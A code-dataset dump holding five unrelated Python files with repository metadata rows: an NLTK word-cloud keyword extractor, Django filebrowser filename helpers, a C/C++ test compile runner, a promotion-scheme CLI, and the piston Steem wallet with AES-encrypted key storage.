| 23.934783 | 75 | 0.752044 | 250 | 2,202 | 6.616 | 0.48 | 0.003628 | 0.003628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027763 | 0.133061 | 2,202 | 91 | 76 | 24.197802 | 0.838659 | 0.161671 | 0 | 0 | 0 | 0 | 0.046605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.054545 | 0 | 0.054545 | 0.054545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bcd24af92ff2049a8f1702bee4c476fb75c0379 | 3,381 | py | Python | generator/functions/make_keyword_wordart.py | niyazed/wordify | bc927947476568544cd79d05e0a2ea007e3de2d0 | [
"MIT"
] | 2 | 2020-05-18T21:33:55.000Z | 2021-03-11T17:38:37.000Z | generator/functions/make_keyword_wordart.py | niyazed/wordify | bc927947476568544cd79d05e0a2ea007e3de2d0 | [
"MIT"
] | 8 | 2020-02-14T02:26:41.000Z | 2021-09-22T18:32:00.000Z | generator/functions/make_keyword_wordart.py | niyazed/wordify | bc927947476568544cd79d05e0a2ea007e3de2d0 | [
"MIT"
] | null | null | null | import nltk
from nltk import word_tokenize
import string
from nltk.stem import WordNetLemmatizer
from wordcloud import WordCloud, STOPWORDS

# nltk.download('punkt')
# nltk.download('averaged_perceptron_tagger')
# nltk.download('wordnet')


class generate:
    def __init__(self, text):
        self.text = text

    def clean(self):
        text = self.text.lower()
        printable = set(string.printable)
        text = filter(lambda x: x in printable, text)  # filter funny characters, if any
        self.text = "".join(text)

    def process_text(self):
        self.clean()
        Cleaned_text = self.text
        text = word_tokenize(Cleaned_text)

        POS_tag = nltk.pos_tag(text)

        wordnet_lemmatizer = WordNetLemmatizer()
        adjective_tags = ['JJ', 'JJR', 'JJS']
        lemmatized_text = []
        for word in POS_tag:
            if word[1] in adjective_tags:
                lemmatized_text.append(str(wordnet_lemmatizer.lemmatize(word[0], pos="a")))
            else:
                lemmatized_text.append(str(wordnet_lemmatizer.lemmatize(word[0])))  # default POS = noun

        # print("Text tokens after lemmatization of adjectives and nouns: \n")
        # print(lemmatized_text)

        POS_tag = nltk.pos_tag(lemmatized_text)

        stopwords = []
        wanted_POS = ['NN', 'NNS', 'NNP', 'NNPS', 'JJ', 'JJR', 'JJS', 'VBG', 'FW']
        for word in POS_tag:
            if word[1] not in wanted_POS:
                stopwords.append(word[0])

        punctuations = list(str(string.punctuation))
        stopwords = stopwords + punctuations

        # stopword_file = open("long_stopwords.txt", "r") edit maybe
        # Source = https://www.ranks.nl/stopwords
        stopword_file = set(STOPWORDS)
        lots_of_stopwords = []
        for line in stopword_file:
            lots_of_stopwords.append(str(line.strip()))

        stopwords_plus = stopwords + lots_of_stopwords
        stopwords_plus = set(stopwords_plus)  # stopwords_plus contains the total set of all stopwords

        processed_text = []
        for word in lemmatized_text:
            if word not in stopwords_plus:
                processed_text.append(word)
        self.text = processed_text

    def generate_keyword(self):
        self.process_text()
        words = self.text  # read the words into a list
        uniqWords = sorted(set(words))  # remove duplicate words and sort
        counts = {}  # word -> frequency (renamed from `dict` to avoid shadowing the builtin)
        for word in uniqWords:
            counts[word] = words.count(word)
        sd = sorted(counts.items(), key=lambda kv: kv[1])
        sd.reverse()
        return sd

    def generate_wordart(self):
        # assumes process_text() has already run (e.g. via generate_keyword),
        # so self.text is a list of tokens rather than a raw string
        words = self.text
        counts = {}  # word -> frequency (renamed from `dict` to avoid shadowing the builtin)
        for word in words:
            counts[word] = counts.get(word, 0) + 1
        sorted_x = sorted(counts.items(), key=lambda kv: kv[1])
        sorted_x.reverse()
        l = []
        max_kw = 10
        for i in range(0, max_kw):
            l.append(sorted_x[i][0])
        dictionary = {}
        for x in sorted_x:
            dictionary[x[0]] = x[1]
        wordcloud = WordCloud(font_path='kalpurush.ttf', min_font_size=10, background_color="white").generate_from_frequencies(dictionary)
        wordcloud.to_file('cloud.png')
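
# A short usage sketch (the input text is illustrative, and the word-art step
# requires 'kalpurush.ttf' to be present in the working directory):
# g = generate("Natural language processing extracts keywords from raw text.")
# print(g.generate_keyword()[:5])  # top five (word, frequency) pairs
# g.generate_wordart()             # writes cloud.png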
| 28.411765 | 139 | 0.597456 | 411 | 3,381 | 4.756691 | 0.3309 | 0.036829 | 0.027621 | 0.016368 | 0.185166 | 0.185166 | 0.142199 | 0.142199 | 0.090026 | 0 | 0 | 0.007137 | 0.295475 | 3,381 | 118 | 140 | 28.652542 | 0.813602 | 0.147294 | 0 | 0.108108 | 0 | 0 | 0.021262 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067568 | false | 0 | 0.067568 | 0 | 0.162162 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd0c05ae4e8061d76b12526917129097eb9bc66 | 1,037 | py | Python | filebrowser/utils.py | albadrun/django-filebrowser-no-grappelli-no-pillow | 5c85efae5b5bd934b6d71582a3f0c6efe01979d6 | [
"BSD-3-Clause"
] | null | null | null | filebrowser/utils.py | albadrun/django-filebrowser-no-grappelli-no-pillow | 5c85efae5b5bd934b6d71582a3f0c6efe01979d6 | [
"BSD-3-Clause"
] | null | null | null | filebrowser/utils.py | albadrun/django-filebrowser-no-grappelli-no-pillow | 5c85efae5b5bd934b6d71582a3f0c6efe01979d6 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
import re
import os
import unicodedata
import math

import six
from django.utils.module_loading import import_string

from filebrowser.settings import NORMALIZE_FILENAME, CONVERT_FILENAME


def convert_filename(value):
    """
    Convert Filename.
    """
    if NORMALIZE_FILENAME:
        chunks = value.split(os.extsep)
        normalized = []
        for v in chunks:
            v = unicodedata.normalize('NFKD', six.text_type(
                v)).encode('ascii', 'ignore').decode('ascii')
            v = re.sub(r'[^\w\s-]', '', v).strip()
            normalized.append(v)

        if len(normalized) > 1:
            value = '.'.join(normalized)
        else:
            value = normalized[0]

    if CONVERT_FILENAME:
        value = value.replace(" ", "_").lower()

    return value
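
# Example behavior, assuming NORMALIZE_FILENAME and CONVERT_FILENAME are both
# enabled in settings (the input is illustrative):
#   convert_filename("Mön key Pic.JPG")  ->  "mon_key_pic.jpg"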

def path_strip(path, root):
    if not path or not root:
        return path
    path = os.path.normcase(path)
    root = os.path.normcase(root)
    if path.startswith(root):
        return path[len(root):]
    return path
| 22.06383 | 69 | 0.600771 | 125 | 1,037 | 4.904 | 0.456 | 0.097879 | 0.068516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004016 | 0.279653 | 1,037 | 46 | 70 | 22.543478 | 0.8166 | 0.030858 | 0 | 0.064516 | 0 | 0 | 0.031345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.225806 | 0 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd19aef2b594e4beb08b1c61935213131c03545 | 1,985 | py | Python | tests/cte.py | Airleaf/traffic-sim | ff7acaefe7ef8c73d0f032ecad18947ad46da146 | [
"Apache-2.0"
] | null | null | null | tests/cte.py | Airleaf/traffic-sim | ff7acaefe7ef8c73d0f032ecad18947ad46da146 | [
"Apache-2.0"
] | 8 | 2021-02-13T15:11:58.000Z | 2021-02-15T17:39:00.000Z | tests/cte.py | Airleaf/traffic-sim | ff7acaefe7ef8c73d0f032ecad18947ad46da146 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
#
# This script is used for custom compilation scripts with selected
# modules in order to achieve a selected environment for the running
# code. This is done using the test.json file located in every test.
#
# The first argument is the name of the test environment, being the
# folder name where test.json is located.
#

import argparse
import json
import os

sh = os.system

# Argument parser
parser = argparse.ArgumentParser()
parser.add_argument('test', type=str, help='Name of the test directory found in tests/')
args = parser.parse_args()


def stop(msg):
    # Print the given message and exit the program
    print(msg)
    quit()


def main():
    # Check if file exists
    if not os.path.isdir(args.test):
        stop(f'Cannot find \'{args.test}\' or it\'s not a directory')

    # Read test configuration
    try:
        with open(f'{args.test}/test.json') as f:
            cfg = json.load(f)
    except FileNotFoundError:
        stop('All tests are required to have a \'test.json\' file')

    if 'main' not in cfg:
        stop('\'main\' field not found in test.json file')
    if 'cpp-sources' not in cfg:
        stop('\'cpp-sources\' field not found in test.json file')

    object_files = []

    # Compile
    for src in cfg['cpp-sources']:
        sh(f'g++ -c -o __out__/{src}.o ../src/{src}')
        object_files.append(f'__out__/{src}.o')
    # guard with .get() so a missing 'c-sources' field doesn't raise KeyError
    for src in cfg.get('c-sources', []):
        sh(f'gcc -c -o __out__/{src}.o ../src/{src}')
        object_files.append(f'__out__/{src}.o')

    # Find links
    libs = []
    if 'libs' in cfg:
        libs = ['-l' + s for s in cfg['libs']]

    # Choose executable
    exe = args.test
    if 'executable' in cfg:
        exe = cfg['executable']

    # Link
    objf = ' '.join(object_files)
    libs = ' '.join(libs)
    sh(f'g++ -o {args.test}/{exe} {args.test}/{cfg["main"]} {objf} {libs}')

    # Execute
    os.chdir(f'./{args.test}')
    sh(f'./{exe}')


if __name__ == "__main__":
    main()
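
# A test.json sketch matching the fields this script reads ('main' and
# 'cpp-sources' are required; 'c-sources', 'libs' and 'executable' are
# optional). All values are illustrative:
#
#   {
#       "main": "main.cpp",
#       "cpp-sources": ["road.cpp", "car.cpp"],
#       "c-sources": [],
#       "libs": ["pthread"],
#       "executable": "sim"
#   }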
| 24.8125 | 88 | 0.611083 | 298 | 1,985 | 3.969799 | 0.379195 | 0.047337 | 0.040575 | 0.021978 | 0.113271 | 0.113271 | 0.113271 | 0.067625 | 0.067625 | 0.067625 | 0 | 0.000666 | 0.243829 | 1,985 | 79 | 89 | 25.126582 | 0.787475 | 0.240302 | 0 | 0.047619 | 0 | 0 | 0.309396 | 0.030872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.071429 | 0 | 0.119048 | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd351c81bdbf7b0fc4d0428569a34e08fce0261 | 1,512 | py | Python | main.py | abhilasharevur/ospin-promotion | e7814e6f2c745af250ba65ac0ab051af8ad4925c | [
"MIT"
] | null | null | null | main.py | abhilasharevur/ospin-promotion | e7814e6f2c745af250ba65ac0ab051af8ad4925c | [
"MIT"
] | null | null | null | main.py | abhilasharevur/ospin-promotion | e7814e6f2c745af250ba65ac0ab051af8ad4925c | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import os.path
import argparse

from src.app import main as app_main


def run():
    parser = argparse.ArgumentParser()

    # command line arguments
    parser.add_argument(
        "--input-path",
        help="Absolute path to input directory where .csv files reside",
        # nargs="+",
        required=True
    )
    parser.add_argument(
        "--promotion-type",
        default=None,
        help="The type of promotion scheme",
    )
    parser.add_argument(
        "--output-path",
        help="Absolute path to output file to store results",
        default="output/output.csv"
    )
    argvs = parser.parse_args()

    if validate_path_dir(argvs, "input_path"):
        arg_input_path = argvs.input_path
        if validate_path_file(argvs, "output_path"):
            arg_output_path = argvs.output_path
            arg_promotion_type = argvs.promotion_type
            if arg_promotion_type is None:
                print("please input promotion type")
            else:
                app_main(arg_input_path, arg_promotion_type, arg_output_path)


def validate_path_dir(argvs, opt):
    path_ = getattr(argvs, opt)
    if not os.path.isdir(path_):
        print("Directory path {} of {} does not exist".format(path_, opt))
        return False
    return True


def validate_path_file(argvs, opt):
    path_ = getattr(argvs, opt)
    if not os.path.isfile(path_):
        print("File path {} of {} does not exist".format(path_, opt))
        return False
    return True


if __name__ == '__main__':
    run()
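
# A typical invocation; the paths and scheme name are placeholders:
#   python3 main.py --input-path /data/promotions \
#                   --promotion-type buy2get1 \
#                   --output-path output/output.csv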
| 24 | 75 | 0.64418 | 196 | 1,512 | 4.729592 | 0.336735 | 0.084142 | 0.055016 | 0.04315 | 0.243797 | 0.196332 | 0.196332 | 0.196332 | 0.196332 | 0.196332 | 0 | 0.000883 | 0.251323 | 1,512 | 62 | 76 | 24.387097 | 0.818021 | 0.03373 | 0 | 0.204545 | 0 | 0 | 0.216735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.068182 | 0 | 0.227273 | 0.068182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd3f111c1e1343f5f5a3b4a6545c2bf77669071 | 8,310 | py | Python | piston/wallet.py | faddat/piston | 13459d720453090360ea5acace62bb40f8671d7c | [
"MIT"
] | null | null | null | piston/wallet.py | faddat/piston | 13459d720453090360ea5acace62bb40f8671d7c | [
"MIT"
] | null | null | null | piston/wallet.py | faddat/piston | 13459d720453090360ea5acace62bb40f8671d7c | [
"MIT"
] | null | null | null | import os
import json
import base64
import hashlib
from Crypto import Random
from Crypto.Cipher import AES
from steembase import PrivateKey
from appdirs import user_data_dir
import logging
log = logging.getLogger(__name__)
appname = "piston"
appauthor = "Fabian Schuh"
walletFile = "wallet.dat"
prefix = "STM"
# prefix = "TST"

class Wallet(object):
    keys = []
    rpc = None
    aes = None

    def __init__(self, rpc, *args, **kwargs):
        self.rpc = rpc

    def open(self, password=None):
        if not password and not self.keys:
            # try to load the file without password
            import getpass
            if self.exists():
                if not self._openWallet(""):
                    print("Please unlock your existing wallet!")
                    while True:
                        pw = getpass.getpass('Passphrase: ')
                        if self._openWallet(pw):
                            break
            else:
                print("No wallet has been created yet. " +
                      "Please provide a passphrase for it!")
                while True:
                    pw = getpass.getpass('Passphrase: ')
                    if not pw:
                        print("You have chosen an empty password! " +
                              "We assume you understand the risks!")
                        self._openWallet(pw)
                        break
                    else:
                        pwck = getpass.getpass('Retype passphrase: ')
                        if pw == pwck:
                            self._openWallet(pw)
                            break
                        else:
                            print("Given Passphrases do not match!")
def setKeys(self, keys):
self.keys = keys
def _openWallet(self, pw):
if pw != "":
self.aes = AESCipher(pw)
if self.exists():
try:
self.keys = self._loadPrivateKeys()
return True
            except Exception:
return False
else:
self._storeWallet()
return True
    def isOpen(self):
        # Truthy when at least one private key has been loaded
        return self.keys
def ensureOpen(self):
if not self.isOpen():
self.open()
@staticmethod
def exists():
data_dir = user_data_dir(appname, appauthor)
f = os.path.join(data_dir, walletFile)
return os.path.isfile(f)
    def mkdir_p(self, path):
        # Create the directory (and any parents) if it does not exist yet;
        # exist_ok avoids the isdir/makedirs race of a manual check
        os.makedirs(path, exist_ok=True)
def _storeWallet(self):
data_dir = user_data_dir(appname, appauthor)
f = os.path.join(data_dir, walletFile)
log.info("Your encrypted wallet file is located at " + f)
self.mkdir_p(data_dir)
try:
# Test if ciphertext can be constructed
if self.aes:
self.aes.encrypt(json.dumps(self.keys))
else:
json.dumps(self.keys)
with open(f, 'w') as fp:
if self.aes:
ciphertext = self.aes.encrypt(json.dumps(self.keys))
fp.write(ciphertext)
else:
json.dump(self.keys, fp)
        except Exception:
            raise Exception("Error formatting wallet. Skipping ..")
def _loadPrivateKeys(self):
data_dir = user_data_dir(appname, appauthor)
f = os.path.join(data_dir, walletFile)
        if os.path.isfile(f):
with open(f, 'r') as fp:
try:
if self.aes:
ciphertext = fp.read()
plaintext = self.aes.decrypt(ciphertext)
self.keys = json.loads(plaintext)
else:
self.keys = json.load(fp)
return self.keys
                except Exception:
raise ValueError("Error decrypting/loading keys! Check passphrase!")
else:
return []
def getPrivateKeyForPublicKey(self, pub):
self.ensureOpen()
for key in self.keys:
            if format(PrivateKey(key).pubkey, prefix) == pub:
                return key
def getPostingKeyForAccount(self, name):
account = self.rpc.get_account(name)
for authority in account["posting"]["key_auths"]:
key = self.getPrivateKeyForPublicKey(authority[0])
if key:
return key
return False
def getMemoKeyForAccount(self, name):
self.ensureOpen()
account = self.rpc.get_account(name)
key = self.getPrivateKeyForPublicKey(account["memo_key"])
if key:
return key
return False
def getActiveKeyForAccount(self, name):
self.ensureOpen()
account = self.rpc.get_account(name)
for authority in account["active"]["key_auths"]:
key = self.getPrivateKeyForPublicKey(authority[0])
if key:
return key
return False
def removePrivateKeyFromPublicKey(self, pub):
self.ensureOpen()
for key in self.keys:
if format(PrivateKey(key).pubkey, prefix) == pub:
self.keys.remove(key)
self._storeWallet()
def addPrivateKey(self, wif):
self.ensureOpen()
try:
if isinstance(wif, PrivateKey):
pub = format(wif.pubkey, prefix)
self.keys.append(str(wif))
else:
pub = format(PrivateKey(wif).pubkey, prefix)
self.keys.append(wif)
        except Exception:
log.error("Invalid Private Key Format. Please use WIF!")
return
self.keys = list(set(self.keys))
self._storeWallet()
return pub
def getAccountFromPrivateKey(self, wif):
pub = format(PrivateKey(wif).pubkey, prefix)
return self.rpc.get_key_references([pub])[0][0]
def getAccountFromPublicKey(self, pub):
return self.rpc.get_key_references([pub])[0][0]
def getAccount(self, pub):
name = self.rpc.get_key_references([pub])[0]
if not name:
return ["n/a", "n/a", pub]
else:
account = self.rpc.get_account(name[0])
keyType = self.getKeyType(account, pub)
return [name[0], keyType, pub]
def getKeyType(self, account, pub):
if pub == account["memo_key"]:
return "memo"
for authority in ["owner", "posting", "active"]:
for key in account[authority]["key_auths"]:
if pub == key[0]:
return authority
return None
def getAccounts(self):
return [self.getAccount(a) for a in self.getPublicKeys()]
def getPublicKeys(self):
self.ensureOpen()
pub = []
for key in self.keys:
try:
pub.append(format(PrivateKey(key).pubkey, prefix))
            except Exception:
continue
return pub
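
# A minimal usage sketch of the Wallet API (an assumption, not part of the
# original module). The rpc object must provide get_account() and
# get_key_references(); StubRPC and the WIF string below are hypothetical
# placeholders, and _demo_wallet() is never called by the module itself.
class StubRPC(object):
    def get_account(self, name):
        # Shape mirrors what Wallet expects from the real RPC
        return {"memo_key": "", "owner": {"key_auths": []},
                "posting": {"key_auths": []}, "active": {"key_auths": []}}

    def get_key_references(self, pubs):
        return [["demo-account"]]

def _demo_wallet():
    wallet = Wallet(StubRPC())
    wallet.open()                          # prompts for (or creates) a passphrase
    pub = wallet.addPrivateKey("5J...")    # hypothetical WIF-encoded key
    if pub:
        print(wallet.getAccounts())        # [[name, key type, pubkey], ...]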
class AESCipher(object):
"""
A classical AES Cipher. Can use any size of data and any size of password thanks to padding.
Also ensure the coherence and the type of the data with a unicode to byte converter.
"""
def __init__(self, key):
self.bs = 32
self.key = hashlib.sha256(AESCipher.str_to_bytes(key)).digest()
@staticmethod
    def str_to_bytes(data):
        # b''.decode('utf8') yields the text type (str on Python 3), so this
        # encodes text to UTF-8 bytes and passes bytes through unchanged
        u_type = type(b''.decode('utf8'))
        if isinstance(data, u_type):
            return data.encode('utf8')
        return data
    def _pad(self, s):
        # PKCS#7-style padding to a self.bs (32-byte) boundary, which is
        # also a multiple of the 16-byte AES block size
        return s + (self.bs - len(s) % self.bs) * AESCipher.str_to_bytes(chr(self.bs - len(s) % self.bs))
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s) - 1:])]
def encrypt(self, raw):
raw = self._pad(AESCipher.str_to_bytes(raw))
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw)).decode('utf-8')
def decrypt(self, enc):
enc = base64.b64decode(enc)
iv = enc[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
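
# Round-trip sanity check (illustrative, not part of the original module;
# the passphrase and message below are arbitrary example values):
if __name__ == "__main__":
    cipher = AESCipher("correct horse battery staple")
    token = cipher.encrypt("hello wallet")    # base64(iv + ciphertext)
    assert cipher.decrypt(token) == "hello wallet"
    print("AESCipher round trip OK")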
| 31.83908 | 105 | 0.530806 | 911 | 8,310 | 4.760703 | 0.243688 | 0.036892 | 0.01614 | 0.015679 | 0.307125 | 0.290523 | 0.237261 | 0.193221 | 0.193221 | 0.193221 | 0 | 0.005722 | 0.369073 | 8,310 | 260 | 106 | 31.961538 | 0.821476 | 0.032371 | 0 | 0.401826 | 0 | 0 | 0.068338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127854 | false | 0.045662 | 0.045662 | 0.022831 | 0.342466 | 0.018265 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |